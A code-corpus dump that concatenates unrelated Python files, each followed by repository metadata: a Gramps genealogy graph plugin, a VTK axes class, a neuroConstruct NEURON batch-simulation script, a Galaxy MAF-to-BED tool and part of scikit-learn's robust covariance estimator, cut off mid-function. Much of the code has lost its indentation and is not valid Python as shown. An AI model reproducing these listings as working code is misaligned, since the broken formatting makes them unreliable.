if weddingPlace:
if label != '':
label += '\\n'
label += '%s' % weddingPlace
if childrenStr:
if label != '':
label += '\\n'
label += '%s' % childrenStr
shape = "ellipse"
style = "solid"
border = self._colorfamilies
fill = self._colorfamilies
# do not use colour if this is B&W outline
if self._colorize == 'outline':
border = ""
fill = ""
# if we're filling the entire node:
if self._colorize == 'filled':
style += ",filled"
border = ""
# we're done -- add the node
self.doc.add_node(fgid, label, shape, border, style, fill)
# now that we have the families written, go ahead and link the parents and children to the families
for family_handle in self._families:
# get the parents for this family
family = self._db.get_family_from_handle(family_handle)
fgid = family.get_gramps_id()
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
self.doc.add_comment('')
if self._usesubgraphs and father_handle and mother_handle:
self.doc.start_subgraph(fgid)
# see if we have a father to link to this family
if father_handle:
if father_handle in self._people:
father = self._db.get_person_from_handle(father_handle)
comment = "father: %s" % father.get_primary_name().get_regular_name()
self.doc.add_link(father.get_gramps_id(), fgid, comment=comment)
# see if we have a mother to link to this family
if mother_handle:
if mother_handle in self._people:
mother = self._db.get_person_from_handle(mother_handle)
comment = "mother: %s" % mother.get_primary_name().get_regular_name()
self.doc.add_link(mother.get_gramps_id(), fgid, comment=comment)
if self._usesubgraphs and father_handle and mother_handle:
self.doc.end_subgraph()
# link the children to the family
for childRef in family.get_child_ref_list():
if childRef.ref in self._people:
child = self._db.get_person_from_handle(childRef.ref)
comment = "child: %s" % child.get_primary_name().get_regular_name()
self.doc.add_link(fgid, child.get_gramps_id(), comment=comment)
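        # Illustrative sketch (not part of the original plugin): the add_node
        # and add_link calls above emit Graphviz statements roughly like the
        # following (identifiers and names below are hypothetical):
        #   I0001 [label="Edward Smith\n(1901 - 1970)", shape="box", style="solid"];
        #   F0001 [label="1925\n2 children", shape="ellipse", style="solid"];
        #   I0001 -> F0001;  // father: Edward Smith
        #   F0001 -> I0002;  // child: Mary Smith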
|
Forage/Gramps
|
gramps/plugins/graph/gvfamilylines.py
|
Python
|
gpl-2.0
| 43,919
|
[
"Brian"
] |
fd9ae781a495bd6fbae20b9c26101e89f39c013f294c90f5f4836fa8ed408465
|
'''
Created on Aug 5, 2014
@author: gearsad
'''
import vtk
from SceneObject import SceneObject
class Axes(SceneObject):
'''
A template for drawing axes.
    Shouldn't really be in a class of its own, but it's cleaner here and like this we can move it easily.
Ref: http://vtk.org/gitweb?p=VTK.git;a=blob;f=Examples/GUI/Tcl/ProbeWithSplineWidget.tcl
'''
def __init__(self, renderer):
'''
Initialize the axes - not the parent version, we're going to assign a vtkAxesActor to it and add it ourselves.
'''
# Skip the parent constructor
#super(Axes,self).__init__(renderer)
# Ref: http://vtk.org/gitweb?p=VTK.git;a=blob;f=Examples/GUI/Tcl/ProbeWithSplineWidget.tcl
self.vtkActor = vtk.vtkAxesActor()
self.vtkActor.SetShaftTypeToCylinder()
self.vtkActor.SetCylinderRadius(0.05)
self.vtkActor.SetTotalLength(2.5, 2.5, 2.5)
# Change the font size to something reasonable
# Ref: http://vtk.1045678.n5.nabble.com/VtkAxesActor-Problem-td4311250.html
        self.vtkActor.GetXAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
        self.vtkActor.GetXAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25)
        self.vtkActor.GetYAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
        self.vtkActor.GetYAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25)
        self.vtkActor.GetZAxisCaptionActor2D().GetTextActor().SetTextScaleMode(vtk.vtkTextActor.TEXT_SCALE_MODE_NONE)
        self.vtkActor.GetZAxisCaptionActor2D().GetTextActor().GetTextProperty().SetFontSize(25)
# Add the actor.
renderer.AddActor(self.vtkActor)
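        # Minimal usage sketch (assumes a standard VTK render loop set up by
        # the caller; the variable names below are illustrative, not part of
        # this module):
        #   renderer = vtk.vtkRenderer()
        #   window = vtk.vtkRenderWindow()
        #   window.AddRenderer(renderer)
        #   interactor = vtk.vtkRenderWindowInteractor()
        #   interactor.SetRenderWindow(window)
        #   axes = Axes(renderer)  # registers the vtkAxesActor with the renderer
        #   window.Render()
        #   interactor.Start()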
|
GearsAD/semisorted_arnerve
|
sandbox/bot_vis_platform_post3b/scene/Axes.py
|
Python
|
mit
| 1,801
|
[
"VTK"
] |
b52e980e822cec5eb7cdb46f57e267c7882556f19370d43d28675d52d3bd86e1
|
#
# A file that opens the neuroConstruct project LarkumEtAl2009 and runs multiple simulations stimulating each terminal apical branch with a varying number of synapses.
#
# Author: Matteo Farinella
from sys import *
from java.io import File
from java.lang import System
from java.util import ArrayList
from ucl.physiol.neuroconstruct.project import ProjectManager
from ucl.physiol.neuroconstruct.neuron import NeuronFileManager
from ucl.physiol.neuroconstruct.utils import NumberGenerator
from ucl.physiol.neuroconstruct.nmodleditor.processes import ProcessManager
from ucl.physiol.neuroconstruct.simulation import SimulationData
from ucl.physiol.neuroconstruct.gui import SimulationRerunFrame
from ucl.physiol.neuroconstruct.gui.plotter import PlotManager
from ucl.physiol.neuroconstruct.gui.plotter import PlotCanvas
from ucl.physiol.neuroconstruct.dataset import DataSet
from math import *
import time
import shutil
import random
import os
import subprocess
# Load the original project
projName = "LarkumEtAl2009"
projFile = File("/home/matteo/neuroConstruct/models/"+projName+"/"+projName+".ncx")
print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists())
pm = ProjectManager()
myProject = pm.loadProject(projFile)
simConfig = myProject.simConfigInfo.getSimConfig("Default Simulation Configuration")#
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
numGenerated = myProject.generatedCellPositions.getNumberInAllCellGroups()
simsRunning = []
def updateSimsRunning():
simsFinished = []
for sim in simsRunning:
timeFile = File(myProject.getProjectMainDirectory(), "simulations/"+sim+"/time.dat")
#print "Checking file: "+timeFile.getAbsolutePath() +", exists: "+ str(timeFile.exists())
if (timeFile.exists()):
simsFinished.append(sim)
if(len(simsFinished)>0):
for sim in simsFinished:
simsRunning.remove(sim)
if numGenerated > 0:
print "Generating NEURON scripts..."
myProject.neuronFileManager.setQuitAfterRun(1) # Remove this line to leave the NEURON sim windows open after finishing
myProject.neuronSettings.setCopySimFiles(1) # 1 copies hoc/mod files to PySim_0 etc. and will allow multiple sims to run at once
myProject.neuronSettings.setGraphicsMode(False) # Run NEURON without GUI
# Note same network structure will be used for each!
# Change this number to the number of processors you wish to use on your local machine
maxNumSimultaneousSims = 100
#multiple simulation settings:
prefix = "" #string that will be added to the name of the simulations to identify the simulation set
trials = 100
Nbranches = 8
Configuration = ["NMDAspike input"]
apical_branch = ["apical17","apical18","apical21","apical23","apical24","apical25","apical27","apical28","apical31","apical34","apical35","apical37","apical38","apical44","apical46","apical52","apical53","apical54","apical56","apical57","apical61","apical62","apical65","apical67","apical68","apical69","apical72","apical73"]
apical_stim = ["NMDAs_17","NMDAs_18","NMDAs_21","NMDAs_23","NMDAs_24","NMDAs_25","NMDAs_27","NMDAs_28","NMDAs_31","NMDAs_34","NMDAs_35","NMDAs_37","NMDAs_38","NMDAs_44","NMDAs_46","NMDAs_52","NMDAs_53","NMDAs_54","NMDAs_56","NMDAs_57","NMDAs_61","NMDAs_62","NMDAs_65","NMDAs_67","NMDAs_68","NMDAs_69","NMDAs_72","NMDAs_73"]
apical_ID =[4460,4571,4793,4961,4994,5225,5477,5526,5990,6221,6274,6523,6542,6972,7462,8026,8044,8088,8324,8468,8685,8800,8966,9137,9160,9186,9592,9639]
apical_length = [98,69,78,26,34,166,161,49,143,55,87,25,38,73,194,19,22,26,25,129,138,95,42,89,21,62,26,18]
apical_plot = ["pyrCML_apical17_V","pyrCML_apical18_V","pyrCML_apical21_V","pyrCML_apical23_V","pyrCML_apical24_V","pyrCML_apical25_V","pyrCML_apical27_V","pyrCML_apical28_V","pyrCML_apical31_V","pyrCML_apical34_V","pyrCML_apical35_V","pyrCML_apical37_V","pyrCML_apical38_V","pyrCML_apical44_V","pyrCML_apical46_V","pyrCML_apical52_V","pyrCML_apical53_V","pyrCML_apical54_V","pyrCML_apical56_V","pyrCML_apical57_V","pyrCML_apical61_V","pyrCML_apical62_V","pyrCML_apical65_V","pyrCML_apical67_V","pyrCML_apical68_V","pyrCML_apical69_V","pyrCML_apical72_V","pyrCML_apical73_V"]
print "Going to run " +str(int(trials*Nbranches)) + " simulations"
refStored = []
simGroups = ArrayList()
simInputs = ArrayList()
simPlots = ArrayList()
stringConfig = Configuration[0]
print "nConstruct using SIMULATION CONFIGURATION: " +stringConfig
simConfig = myProject.simConfigInfo.getSimConfig(stringConfig)
for y in range(2, Nbranches):
j=y+1
selectedBranches = []
prefix = "b"+str(j) #number of branches stimulated
print
print "-----------------------------------------------------------------------"
print str(trials)+" trials, stimulating " +str(int(j))+" branches"
print "reference name: " + prefix +"..."
print "-----------------------------------------------------------------------"
print
for i in range(0, trials):
randomseed = random.randint(1000,5000)
print ""
selectedBranches = []
#empty vectors
simGroups = ArrayList()
simInputs = ArrayList()
simPlots = ArrayList()
######## Selecting j random different apical branches to Input and Plot ###############
for r in range(0,j):
randomApicalBranch = random.randint(0,int(len(apical_branch))-1)
while randomApicalBranch in selectedBranches:
randomApicalBranch = random.randint(0,int(len(apical_branch))-1)
selectedBranches.append(randomApicalBranch)
print "selected branch "+apical_branch[randomApicalBranch]
simInputs.add(apical_stim[randomApicalBranch])
simPlots.add(apical_plot[randomApicalBranch])
simGroups.add("pyrCML_group")
simPlots.add("pyrCML_soma_V")
simConfig.setCellGroups(simGroups)
simConfig.setInputs(simInputs)
simConfig.setPlots(simPlots)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
'''##########################################################################################
simRef = prefix+"control"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK control #####
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(5) # Wait for sim to be kicked off
#####################'''
'''######## Rerunning the same configuration + background exc ###############
simInputs.add("backgroundExc")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"E1500_"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK background exc #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(30) # Wait for sim to be kicked off
simInputs.remove("backgroundExc")
#####################'''
######## Rerunning the same configuration + background exc/inh ###############
simInputs.add("backgroundExc")
simInputs.add("backgroundInh")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"E1500I43_"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
'''##### RUN BLOCK background exc/inh #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(3) # Wait for sim to be kicked off
simInputs.remove("backgroundExc")
simInputs.remove("backgroundInh")
#####################'''
'''######## Rerunning the same configuration + background inh ###############
simInputs.add("backgroundInh")
simConfig.setInputs(simInputs)
print "group generated: "+simConfig.getCellGroups().toString()
print "going to stimulate: "+simConfig.getInputs().toString()
print "going to record: "+simConfig.getPlots().toString()
##########################################################################################
simRef = prefix+"I43"+str(i)
print "Simref: "+simRef
myProject.simulationParameters.setReference(simRef)
refStored.append(simRef)
##### RUN BLOCK background inh #####
randomseed = random.randint(1000,5000)
pm.doGenerate(simConfig.getName(), randomseed)
while pm.isGenerating():
print "Waiting for the project to be generated..."
time.sleep(2)
myProject.neuronFileManager.setSuggestedRemoteRunTime(10)
myProject.neuronFileManager.generateTheNeuronFiles(simConfig, None, NeuronFileManager.RUN_HOC, randomseed)
print "Generated NEURON files for: "+simRef
compileProcess = ProcessManager(myProject.neuronFileManager.getMainHocFile())
compileSuccess = compileProcess.compileFileWithNeuron(0,0)
print "Compiled NEURON files for: "+simRef
if compileSuccess:
pm.doRunNeuron(simConfig)
print "Set running simulation: "+simRef
time.sleep(30) # Wait for sim to be kicked off
#####################'''
### end for i (trials)
### end for j (noise)
######## Extracting simulations results ###############
time.sleep(10)
y=-1
for sim in refStored:
y=y+1
pullSimFilename = "pullsim.sh"
path = "/home/matteo/neuroConstruct/models/"+projName
print "\n------ Checking directory: " + path +"/simulations"+"/"+sim
pullsimFile = path+"/simulations/"+sim+"/"+pullSimFilename
if os.path.isfile(pullsimFile):
print pullSimFilename+" exists and will be executed..."
process = subprocess.Popen("cd "+path+"/simulations/"+sim+"/"+";./"+pullSimFilename, shell=True, stdout=subprocess.PIPE)
stdout_value = process.communicate()[0]
process.wait()
else:
print "Simulation not finished"
if os.path.isfile(path+"/simulations/"+sim+"/pyrCML_group_0.dat"):
print "Simulation results recovered from remote cluster."
simDir = File(path+"/simulations/"+sim)
newFileSoma = path+"/recordings/"+sim+".soma"
shutil.copyfile(path+"/simulations/"+sim+"/pyrCML_group_0.dat" , newFileSoma)
for ID in apical_ID:
if os.path.isfile(path+"/simulations/"+sim+"/pyrCML_group_0."+str(ID)+".dat"):
newFileApical = path+"/recordings/"+sim+"_ID"+str(ID)+".apical"
shutil.copyfile(path+"/simulations/"+sim+"/pyrCML_group_0."+str(ID)+".dat" , newFileApical)
print "Simulation was successful. "
print "Results saved."
print
else:
print "Simulation failed!"
### '''
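# Illustrative sketch (not part of the original script): updateSimsRunning()
# and maxNumSimultaneousSims above suggest a throttling loop around each
# pm.doRunNeuron(simConfig) call, along these lines:
#   while len(simsRunning) >= maxNumSimultaneousSims:
#       print "Waiting for a free slot (%i sims running)..." % len(simsRunning)
#       time.sleep(5)
#       updateSimsRunning()
#   simsRunning.append(simRef)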
|
pgleeson/TestArea
|
models/LarkumEtAl2009/pythonScripts/PAP_multibranches.py
|
Python
|
gpl-2.0
| 13,934
|
[
"NEURON"
] |
d5e31a5ff4edf928cdc955f92c7e4c05287b8987dcfd9b20d73deb5b29c03773
|
#!/usr/bin/env python
"""
Read a maf and output intervals for specified list of species.
"""
import sys, os, tempfile
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.align import maf
assert sys.version_info[:2] >= ( 2, 4 )
def __main__():
input_filename = sys.argv[1]
output_filename = sys.argv[2]
#where to store files that become additional output
database_tmp_dir = './database/tmp' #os.path.join(os.path.split(os.path.split(os.path.realpath(output_filename))[0])[0],'tmp') #database/tmp
species = sys.argv[3].split(',')
partial = sys.argv[4]
out_files = {}
primary_spec = None
if "None" in species:
species = {}
try:
for i, m in enumerate( maf.Reader( open( input_filename, 'r' ) ) ):
for c in m.components:
spec,chrom = maf.src_split( c.src )
if not spec or not chrom:
spec = chrom = c.src
species[spec] = ""
species = species.keys()
    except Exception:
print >>sys.stderr, "Invalid MAF file specified"
return
if "?" in species:
print >>sys.stderr, "Invalid dbkey specified"
return
for i in range( 0, len( species ) ):
spec = species[i]
if i == 0:
out_files[spec] = open( output_filename, 'w' )
primary_spec = spec
else:
out_files[spec] = tempfile.NamedTemporaryFile( mode = 'w', dir = database_tmp_dir, suffix = '.maf_to_bed' )
filename = out_files[spec].name
out_files[spec].close()
out_files[spec] = open( filename, 'w' )
num_species = len( species )
print "Restricted to species:", ",".join( species )
file_in = open( input_filename, 'r' )
maf_reader = maf.Reader( file_in )
block_num = -1
for i, m in enumerate( maf_reader ):
block_num += 1
if "None" not in species:
m = m.limit_to_species( species )
l = m.components
if len(l) < num_species and partial == "partial_disallowed": continue
for c in l:
spec,chrom = maf.src_split( c.src )
if not spec or not chrom:
spec = chrom = c.src
            if spec not in out_files:
out_files[spec] = tempfile.NamedTemporaryFile( mode='w', dir = database_tmp_dir, suffix = '.maf_to_bed' )
filename = out_files[spec].name
out_files[spec].close()
out_files[spec] = open( filename, 'w' )
if c.strand == "-":
out_files[spec].write( chrom + "\t" + str( c.src_size - c.end ) + "\t" + str( c.src_size - c.start ) + "\t" + spec + "_" + str( block_num ) + "\t" + "0\t" + c.strand + "\n" )
else:
out_files[spec].write( chrom + "\t" + str( c.start ) + "\t" + str( c.end ) + "\t" + spec + "_" + str( block_num ) + "\t" + "0\t" + c.strand + "\n" )
file_in.close()
    for file_out in out_files:
        out_files[file_out].close()
    for spec in out_files:
if spec != primary_spec:
print "#FILE\t" + spec + "\t" + os.path.join( database_tmp_dir, os.path.split( out_files[spec].name )[1] )
else:
print "#FILE1\t" + spec + "\t" + out_files[spec].name
if __name__ == "__main__": __main__()
|
dbcls/dbcls-galaxy
|
tools/maf/maf_to_bed.py
|
Python
|
mit
| 3,486
|
[
"Galaxy"
] |
14616c24758748d6b523790f93ab01b74730158e3649fabec64114029489437d
|
"""
Robust location and covariance estimators.
Here are implemented estimators that are resistant to outliers.
"""
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import linalg
from scipy.stats import chi2
from . import empirical_covariance, EmpiricalCovariance
from ..utils.extmath import fast_logdet, pinvh
from ..utils import check_random_state
# Minimum Covariance Determinant
# Implementing of an algorithm by Rousseeuw & Van Driessen described in
# (A Fast Algorithm for the Minimum Covariance Determinant Estimator,
# 1999, American Statistical Association and the American Society
# for Quality, TECHNOMETRICS)
def c_step(X, n_support, remaining_iterations=30, initial_estimates=None,
verbose=False, cov_computation_method=empirical_covariance,
random_state=None):
"""C_step procedure described in [Rouseeuw1984]_ aiming at computing MCD.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data set in which we look for the n_support observations whose
scatter matrix has minimum determinant.
n_support : int, > n_samples / 2
Number of observations to compute the robust estimates of location
and covariance from.
remaining_iterations : int, optional
Number of iterations to perform.
According to [Rouseeuw1999]_, two iterations are sufficient to get
close to the minimum, and we never need more than 30 to reach
convergence.
initial_estimates : 2-tuple, optional
Initial estimates of location and shape from which to run the c_step
procedure:
- initial_estimates[0]: an initial location estimate
- initial_estimates[1]: an initial covariance estimate
verbose : boolean, optional
Verbose mode.
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
Returns
-------
location : array-like, shape (n_features,)
Robust location estimates.
covariance : array-like, shape (n_features, n_features)
Robust covariance estimates.
support : array-like, shape (n_samples,)
A mask for the `n_support` observations whose scatter matrix has
minimum determinant.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
n_samples, n_features = X.shape
# Initialisation
if initial_estimates is None:
# compute initial robust estimates from a random subset
support = np.zeros(n_samples).astype(bool)
support[random_state.permutation(n_samples)[:n_support]] = True
location = X[support].mean(0)
covariance = cov_computation_method(X[support])
else:
# get initial robust estimates from the function parameters
location = initial_estimates[0]
covariance = initial_estimates[1]
# run a special iteration for that case (to get an initial support)
precision = pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(1)
# compute new estimates
support = np.zeros(n_samples).astype(bool)
support[np.argsort(dist)[:n_support]] = True
location = X[support].mean(0)
covariance = cov_computation_method(X[support])
previous_det = np.inf
# Iterative procedure for Minimum Covariance Determinant computation
det = fast_logdet(covariance)
while (det < previous_det) and (remaining_iterations > 0):
# save old estimates values
previous_location = location
previous_covariance = covariance
previous_det = det
previous_support = support
# compute a new support from the full data set mahalanobis distances
precision = pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(axis=1)
# compute new estimates
support = np.zeros(n_samples).astype(bool)
support[np.argsort(dist)[:n_support]] = True
location = X[support].mean(axis=0)
covariance = cov_computation_method(X[support])
det = fast_logdet(covariance)
# update remaining iterations for early stopping
remaining_iterations -= 1
previous_dist = dist
dist = (np.dot(X - location, precision) * (X - location)).sum(axis=1)
# Catch computation errors
if np.isinf(det):
raise ValueError(
"Singular covariance matrix. "
"Please check that the covariance matrix corresponding "
"to the dataset is full rank and that MinCovDet is used with "
"Gaussian-distributed data (or at least data drawn from a "
"unimodal, symmetric distribution.")
# Check convergence
if np.allclose(det, previous_det):
# c_step procedure converged
if verbose:
print("Optimal couple (location, covariance) found before"
" ending iterations (%d left)" % (remaining_iterations))
results = location, covariance, det, support, dist
elif det > previous_det:
# determinant has increased (should not happen)
warnings.warn("Warning! det > previous_det (%.15f > %.15f)"
% (det, previous_det), RuntimeWarning)
results = previous_location, previous_covariance, \
previous_det, previous_support, previous_dist
# Check early stopping
if remaining_iterations == 0:
if verbose:
print('Maximum number of iterations reached')
det = fast_logdet(covariance)
results = location, covariance, det, support, dist
return results
def select_candidates(X, n_support, n_trials, select=1, n_iter=30,
verbose=False,
cov_computation_method=empirical_covariance,
random_state=None):
"""Finds the best pure subset of observations to compute MCD from it.
The purpose of this function is to find the best sets of n_support
observations with respect to a minimization of their covariance
matrix determinant. Equivalently, it removes n_samples-n_support
observations to construct what we call a pure data set (i.e. not
containing outliers). The list of the observations of the pure
data set is referred to as the `support`.
Starting from a random support, the pure data set is found by the
c_step procedure introduced by Rousseeuw and Van Driessen in
[Rouseeuw1999]_.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data (sub)set in which we look for the n_support purest observations.
n_support : int, [(n + p + 1)/2] < n_support < n
The number of samples the pure data set must contain.
select : int, int > 0
Number of best candidates results to return.
n_trials : int, nb_trials > 0 or 2-tuple
Number of different initial sets of observations from which to
run the algorithm.
Instead of giving a number of trials to perform, one can provide a
list of initial estimates that will be used to iteratively run
c_step procedures. In this case:
- n_trials[0]: array-like, shape (n_trials, n_features)
is the list of `n_trials` initial location estimates
- n_trials[1]: array-like, shape (n_trials, n_features, n_features)
is the list of `n_trials` initial covariances estimates
n_iter : int, nb_iter > 0
Maximum number of iterations for the c_step procedure.
(2 is enough to be close to the final solution. "Never" exceeds 20).
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
See Also
---------
`c_step` function
Returns
-------
best_locations : array-like, shape (select, n_features)
The `select` location estimates computed from the `select` best
supports found in the data set (`X`).
best_covariances : array-like, shape (select, n_features, n_features)
The `select` covariance estimates computed from the `select`
best supports found in the data set (`X`).
best_supports : array-like, shape (select, n_samples)
The `select` best supports found in the data set (`X`).
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
n_samples, n_features = X.shape
if isinstance(n_trials, numbers.Integral):
run_from_estimates = False
elif isinstance(n_trials, tuple):
run_from_estimates = True
estimates_list = n_trials
n_trials = estimates_list[0].shape[0]
else:
raise TypeError("Invalid 'n_trials' parameter, expected tuple or "
" integer, got %s (%s)" % (n_trials, type(n_trials)))
# compute `n_trials` location and shape estimates candidates in the subset
all_estimates = []
if not run_from_estimates:
# perform `n_trials` computations from random initial supports
for j in range(n_trials):
all_estimates.append(
c_step(
X, n_support, remaining_iterations=n_iter, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
else:
# perform computations from every given initial estimates
for j in range(n_trials):
initial_estimates = (estimates_list[0][j], estimates_list[1][j])
all_estimates.append(c_step(
X, n_support, remaining_iterations=n_iter,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
all_locs_sub, all_covs_sub, all_dets_sub, all_supports_sub, all_ds_sub = \
zip(*all_estimates)
# find the `n_best` best results among the `n_trials` ones
index_best = np.argsort(all_dets_sub)[:select]
best_locations = np.asarray(all_locs_sub)[index_best]
best_covariances = np.asarray(all_covs_sub)[index_best]
best_supports = np.asarray(all_supports_sub)[index_best]
best_ds = np.asarray(all_ds_sub)[index_best]
return best_locations, best_covariances, best_supports, best_ds
def fast_mcd(X, support_fraction=None,
cov_computation_method=empirical_covariance,
random_state=None):
"""Estimates the Minimum Covariance Determinant matrix.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
support_fraction : float, 0 < support_fraction < 1
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
`[n_sample + n_features + 1] / 2`.
random_state : integer or numpy.RandomState, optional
The generator used to randomly subsample. If an integer is
given, it fixes the seed. Defaults to the global numpy random
number generator.
Notes
-----
The FastMCD algorithm has been introduced by Rousseuw and Van Driessen
in "A Fast Algorithm for the Minimum Covariance Determinant Estimator,
1999, American Statistical Association and the American Society
for Quality, TECHNOMETRICS".
    The principle is to compute robust estimates on random subsets before
    pooling them into larger subsets, and finally into the full data set.
Depending on the size of the initial sample, we have one, two or three
such computation levels.
Note that only raw estimates are returned. If one is interested in
the correction and reweighting steps described in [Rouseeuw1999]_,
see the MinCovDet object.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
.. [Butler1993] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
Returns
-------
location : array-like, shape (n_features,)
Robust location of the data.
covariance : array-like, shape (n_features, n_features)
Robust covariance of the features.
support : array-like, type boolean, shape (n_samples,)
A mask of the observations that have been used to compute
the robust location and covariance estimates of the data set.
"""
random_state = check_random_state(random_state)
X = np.asarray(X)
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. "
"You may want to reshape your data array")
n_samples, n_features = X.shape
# minimum breakdown value
if support_fraction is None:
n_support = int(np.ceil(0.5 * (n_samples + n_features + 1)))
else:
n_support = int(support_fraction * n_samples)
# 1-dimensional case quick computation
# (Rousseeuw, P. J. and Leroy, A. M. (2005) References, in Robust
# Regression and Outlier Detection, John Wiley & Sons, chapter 4)
if n_features == 1:
if n_support < n_samples:
# find the sample shortest halves
X_sorted = np.sort(np.ravel(X))
diff = X_sorted[n_support:] - X_sorted[:(n_samples - n_support)]
halves_start = np.where(diff == np.min(diff))[0]
# take the middle points' mean to get the robust location estimate
location = 0.5 * (X_sorted[n_support + halves_start]
+ X_sorted[halves_start]).mean()
support = np.zeros(n_samples, dtype=bool)
X_centered = X - location
support[np.argsort(np.abs(X - location), 0)[:n_support]] = True
covariance = np.asarray([[np.var(X[support])]])
location = np.array([location])
# get precision matrix in an optimized way
precision = pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
else:
support = np.ones(n_samples, dtype=bool)
covariance = np.asarray([[np.var(X)]])
location = np.asarray([np.mean(X)])
X_centered = X - location
# get precision matrix in an optimized way
precision = pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
# Starting FastMCD algorithm for p-dimensional case
if (n_samples > 500) and (n_features > 1):
# 1. Find candidate supports on subsets
# a. split the set in subsets of size ~ 300
n_subsets = n_samples // 300
n_samples_subsets = n_samples // n_subsets
samples_shuffle = random_state.permutation(n_samples)
h_subset = int(np.ceil(n_samples_subsets *
(n_support / float(n_samples))))
# b. perform a total of 500 trials
n_trials_tot = 500
# c. select 10 best (location, covariance) for each subset
n_best_sub = 10
n_trials = max(10, n_trials_tot // n_subsets)
n_best_tot = n_subsets * n_best_sub
all_best_locations = np.zeros((n_best_tot, n_features))
try:
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
        except MemoryError:
            # The above is too big. Let's try with something much smaller
            # (and less optimal): shrink the candidate pool first, then
            # retry the allocation.
            n_best_tot = 10
            n_best_sub = 2
            all_best_covariances = np.zeros((n_best_tot, n_features,
                                             n_features))
for i in range(n_subsets):
low_bound = i * n_samples_subsets
high_bound = low_bound + n_samples_subsets
current_subset = X[samples_shuffle[low_bound:high_bound]]
best_locations_sub, best_covariances_sub, _, _ = select_candidates(
